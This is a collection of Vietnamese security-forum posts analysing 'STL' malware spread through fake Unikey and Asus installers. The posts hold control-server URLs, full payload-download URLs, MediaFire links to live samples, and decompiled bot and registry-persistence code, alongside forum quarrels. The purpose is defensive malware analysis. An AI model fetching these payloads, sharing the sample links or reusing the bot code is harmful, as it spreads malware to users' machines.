|
|
1. http://rock.yokiz.com/faq.php
2. http://nat.iwct.net/faq.php
3. http://web.zicur.com/faq.php
4. http://drive.nicpad.com/faq.php
5. http://ser.vailsx.com/index.php
6. http://lava.intraxs.net/index.php
7. http://fak.actcas.com/index.php
Mình tổng hợp lại các link mà service từ fake unikey (4 links đầu) và fake asus (3 link sau) sẽ connect tới.
|
|
|
s3ll wrote:
- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???
Miệng bác là cái gì của người ta mà lại đi "oẹ" hộ thế. Tởm quá đê. Mà ở trên thanh minh kêu không làm, dưới lại làm ngay được, thiệt là bái phục.
Btw, đúng là anh TQN có nhắc tới Anonymous và Lulzsec nhưng ý của anh TQN không phải là ảnh trên tài họ. Làm sao lại đi so sánh một cá nhân với một tập thể được nhỉ ?. Mà cậu s3ll cứ làm như tất cả mem của Anonymous đều làm cho Intel với Micro ..., ai cũng là cá nhân kiệt suất không bằng. Vài anh em ở HVA đây, một số cũng tài năng và kiến thức có lẽ cũng phải hơn trăm thằng trong Anonymous hay Lulz )
|
|
|
Đúng rồi, quá trình sign file pe bao giờ cũng phải có cert chứa private key (thường là RSA > 1024 bits), và SHA or MD5 của file được dùng làm hash. Làm sao mà trích xuất nội dung chữ kí từ một file sạch đem attach vào file malware mà vẫn verified được nhỉ ? Nếu được thì các công ty cung cấp chữ kí số còn tồn tại làm gì nữa !.
Hôm nay hay một vài hôm trước, một công ty cung cấp chữ kí số vừa bị hack và mất một loạt các certs (giống với vụ đã xảy ra với Comodo từ hồi tháng 5 vừa rồi). Việc các hacker ăn cắp được các chữ kí số là rất nguy hiểm, điển hình như vụ Stuxnet.
Code:
http://www.theregister.co.uk/2011/08/30/google_chrome_certificate_blacklist/
|
|
|
conmale wrote:
Tội nghiệp TQN.
Trên thế gian này có ba loại người:
1. Loại có trí tuệ và có liêm sỉ.
2. Loại không có trí tuệ nhưng có liêm sỉ.
3. Loại có trí tuệ nhưng không có liêm sỉ.
Những con người có liêm sỉ thường không cần được khuyên bảo hoặc chỉ cần nói một lần là xong. Riêng với những con người không có liêm sỉ thì có chẻ đầu ra đổ vào hàng xe tải lời khuyên cũng vô ích bởi vì thiểu liêm sỉ thì thiếu chất xúc tác để dung nạp lẽ phải, để tiếp nhận cái thiện. Huống hồ chi, "sống chết theo lệnh" thì lại càng khó mà nói chuyện phải quấy.
Một vết thương ung mủ không mổ xẻ ra để rửa cho sạch vi trùng mà che đậy để "ổn định" thì chẳng mấy chốc nó sẽ lan ra và sẽ làm hoại thư cả một cơ thể. Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại.
Em xin bổ sung :
4. Loại không có trí tuệ và không có liêm sỉ.
và "Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại và chỉ có một mà thôi"
|
|
|
Nowhereman wrote:
tôi xin có một vài ý ciến như sau :
a) STL là một tổ chức tội phạm việt nam sống dưới những tên cơ quan, tổ chức.
b) Chẳng có thàng tàu khựa nào tham gia vào vụ DDOS với mailwale made in Viêt cộng này cả .
c) Theo tôi kô nên sử dụng các phần mềm diệt virus trong nước, vì bạn thử nghĩ xem bao nhiêu người có thể ngờ rằng, nằm sâu thẳm trong linh hồn những phần mềm "bảo vệ" đó là vài dòng lệnh quản lý và điều hành mọi điều thuộc về bạn. ngay sau khi bạn click install ? .
>> trong một cuộc chiến, mọi bên đều có lý do; đúng, sai, phải trái = chịu!!!
Thế dùng phần mềm nước ngoài thì đảm bảo là an toàn đấy. Nếu muốn an toàn thì tốt nhất là đừng dùng internet.
|
|
|
TQN wrote:
Hu hu bà con ơi !
Ai giúp giùm em cái, mẫu mới của tụi stl mà em âm thầm RCE nó mấy ngày nay thì tới giờ, sau khi có kết quả, không lòi ra bằng chứng nào là mẫu đó là bot đang DDOS HVA ta ! Nó cứ đè danlambao.blogspot mà phang !
Kể cả có xác định được thì anh nghĩ có dập được không ạ ? Tốc độ cập nhật của các hãng av còn lâu hơn cả tụi nó update biến thể "mới". Lại thêm chuyện thử hỏi có bao nhiêu người biết được mình đang bị nhiễm và chương trình diệt virus trên máy họ có thể diệt được trước khi một mẫu mới được cập nhật.
Mà chả hiểu sao cánh báo chí im ru bà rù thế nhỉ ?
|
|
|
Nhân bài báo cáo "Operation Shady RAT" của McAfee, phía Symantec cũng đưa ra một bản báo cáo, mà nếu đọc thì mọi người sẽ thấy nó cũng giống như những gì đang diễn ra ở HVA :
Code:
http://www.symantec.com/connect/blogs/truth-behind-shady-rat
|
|
|
PXMMRF wrote:
Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngay sau đó STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info.
Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO
Trang chủ của website của công ty SEDO:
http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e
Đây là trang của SEDO thông báo bán ripper.info:
http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e
Anh ơi "ripper.info" với "pripper.info" là nó khác nhau đấy ạ.
Hôm nay cái subdomain này lại được trỏ sang con server khác rồi. Hôm trước
Code:
Trước: map.priper.info [91.121.221.222]
Hôm nay : map.priper.info [208.115.200.206]
Và malware vẫn đang được cập nhật đều :(.
|
|
|
TQN wrote:
Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?
Em quên mất rồi
|
|
|
PXMMRF wrote:
rang0 wrote:
Cùng chào đón 1 server mới của STL nào :
Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)
Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended
Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection)
Em không biết anh check cái "map.ripper.info" thế nào nhưng hôm nay em vẫn download được malware từ cái host đó :
Code:
http://www.mediafire.com/?bdk5fvj8bf8k6nr
|
|
|
Cùng chào đón 1 server mới của STL nào :
Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)
|
|
|
conmale wrote:
- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)
Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !?
|
|
|
Gửi anh PXMMRF,
Hôm nay em ngồi đọc lại, thấy còn 1 bộ Unikey "độc" mà gần đây nhất được upload trên trang download.com.vn, hình như nay đã được gỡ xuống, chính nó drop ra file TeamViewer "giả" và file uxtheme.manifest "giả". Vào thời điểm anh TQN phân tích thì cái server của nó vẫn còn sống, và anh TQN có down về được 2 files : flower.bmp và BlueSphere.bmp.
File BlueSphere.bmp decrypt ra nó chính là 1 file .exe, mạo danh thành file svchost.exe, tại thời điểm đó thì file .exe này chưa làm gì cả, và sẽ được cập nhật trong thời gian không xa. Hiện tại bọn STL đang "tạm thời" off server đó, chỉ không biết một ngày đẹp trời nào đó nó sẽ được bật lại để cập nhật hay không mà thôi ? Hay bọn chúng đành hi sinh con malware và server này vì bị phát hiện quá sớm.
Code:
URL1: http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca
URL2: http://speed.cyline.org:443/BlueSphere.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf
|
|
|
PXMMRF wrote:
Ờ cảm ơn rang0 và đăc biệt là asaxin (tên em giống tên một cầu thủ Nga chơi cho Arsenal quá. Hì hì)
Nhưng mà chưa hết đâu rang0 ạ. Chưa hết ờ câu này của axasin:
Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra
Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.
Có 2 nơi mà file fake unikey sẽ drop MSHelpCenter.* và các thư viện đi kèm đó là : hoặc %windir% hoặc %temp% tuỳ vào việc nó gọi OpenSCManager có thành công hay không.
|
|
|
TQN wrote:
File Unikey của asaxin và 2 file của lequy đã up lên đều ra virus của STL.
Đặc biệt thằng MSHelpCenter.* của lequy up lại khác với MsHelpCenter.* mà ta đã biết, size chỉ còn 2 MB (đã biết: gần 9MB).
Bây giờ em phải đi nữa rồi, chắc trưa hay chiều về mới tranh thủ phân tích.
accouris89, exception và các anh em khác phân tích tụi này nhé !
File MSHelpCenter.* của lequy là giống với mẫu mà asaxin up. File size khác nhau là vì phần "rác" chèn thêm vào được sinh ngẫu nhiên, còn thực ra file gốc chỉ có :
Code:
07/26/2011 11:04 PM 167,936 MsHelpCenter.exe
07/26/2011 11:04 PM 65,536 MsHelpCenter.idx
07/26/2011 11:04 PM 62,976 thumbcache.db
07/26/2011 11:04 PM 36,864 _desktop.ini
|
|
|
asaxin wrote:
Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử.
Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói.
http://www.mediafire.com/?fee5d3428euao0k
Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra.
Vậy là đã giải đáp hoàn toàn thắc mắc của anh PXMMRF về việc MSHelpCenter.exe và MSHelpCenter.idx được sinh ra từ đâu rồi
|
|
|
PXMMRF wrote:
1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?)
2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus?
3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả
Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình??
Em xin trả lời :
1. Ý thứ (1) và thứ (3) của anh (nội dung gần giống nhau) thì hiện giờ em nghĩ không thể xác định được (với chỉ những file mà asaxin up lên cho chúng ta), có lẽ cần có thêm thời gian để phát hiện ra thêm điều gì đó .
2. Cái file MSHelpCenter.idx thì em thấy nó sẽ được chạy hay không là phụ thuộc vào nội dung file cấu hình mà MSHelpCenter.exe tải về từ control server. MSHelpCenter.idx được rename thành file .msi, nhận tham số và thực thi. Nhưng với file MSHelpCenter.idx nhận được từ asaxin thì hình như không bao giờ làm nhiệm vụ .
Edited : Ở trên em nhầm, file MSHelpCenter.idx là file trung gian, nó sẽ được MSHelpCenter.exe rename thành một file random.msi, sau đó MSHelpCenter.exe truyền tham số cho file .msi này (thông qua file .cfg). File .msi sẽ run và kiểm tra tham số và cuối cùng chỉ là để execute file AcrobatUpdater.exe (đã được decrypt từ file images.gif)
|
|
|
int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
int v4; // eax@0
unsigned int v6; // [sp-10h] [bp-38h]@1
HANDLE hObject; // [sp+0h] [bp-28h]@12
DWORD ThreadId; // [sp+4h] [bp-24h]@12
WCHAR v9; // [sp+8h] [bp-20h]@4
LPCWSTR lpFileName; // [sp+Ch] [bp-1Ch]@4
unsigned int *v11; // [sp+10h] [bp-18h]@1
int v12; // [sp+18h] [bp-10h]@1
int (__cdecl *v13)(int, PVOID, int); // [sp+1Ch] [bp-Ch]@1
unsigned int v14; // [sp+20h] [bp-8h]@1
int v15; // [sp+24h] [bp-4h]@1
int v16; // [sp+28h] [bp+0h]@1
v13 = _except_handler4;
v12 = v4;
v14 = __security_cookie ^ (unsigned int)&unk_4126C8;
v6 = (unsigned int)&v16 ^ __security_cookie;
v11 = &v6;
v15 = 0;
SetUnhandledExceptionFilter(TopLevelExceptionFilter);
if ( lstrlenW(lpCmdLine) <= 3 )
{
if ( !lstrlenW(lpCmdLine) )
{
ThreadId = 0;
hObject = CreateThread(0, 0x80000u, StartAddress, 0, 0, &ThreadId);
CloseHandle(hObject);
create_bot();
}
}
else
{
if ( *lpCmdLine == '-' && lpCmdLine[2] == ' ' )
{
v9 = lpCmdLine[1];
lpFileName = lpCmdLine + 3;
switch ( v9 )
{
case 'd':
delete_file(lpFileName);
break;
case 'r':
create_process(lpFileName, &CommandLine, 0);
break;
case 'b':
create_new_process(lpFileName, 0);
break;
}
}
}
return 0;
}
và
Code:
lstrcpyW(&SubKey, L"softw");
lstrcatW(&SubKey, L"are\\micr");
lstrcpyW((LPWSTR)&v6, L"kjewoopipo");
lstrcatW(&SubKey, L"osoft\\w");
lstrcpyW((LPWSTR)&v6, L"rewfe");
lstrcatW(&SubKey, L"indo");
lstrcatW(&SubKey, L"ws\\");
lstrcatW(&SubKey, L"Microsoft Help Center");
RegCreateKeyExW(HKEY_CURRENT_USER, &SubKey, 0, 0, 0, 0xF003Fu, 0, &hKey, &dwDisposition);
cbData = 2000;
v12 = RegQueryValueExW(hKey, ValueName, 0, &Type, (LPBYTE)Data, &cbData);
if ( v12 )
{
v1 = lstrlenW((LPCWSTR)Data);
RegSetValueExW(hKey, ValueName, 0, 1u, (const BYTE *)Data, 2 * v1);
}
RegCloseKey(hKey);
Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ?
|
|
|
PXMMRF wrote:
Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng).
Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác
Gửi anh PXMMRF,
Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ.
Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh.
Rang0 !
|
|
|
|
|
|
|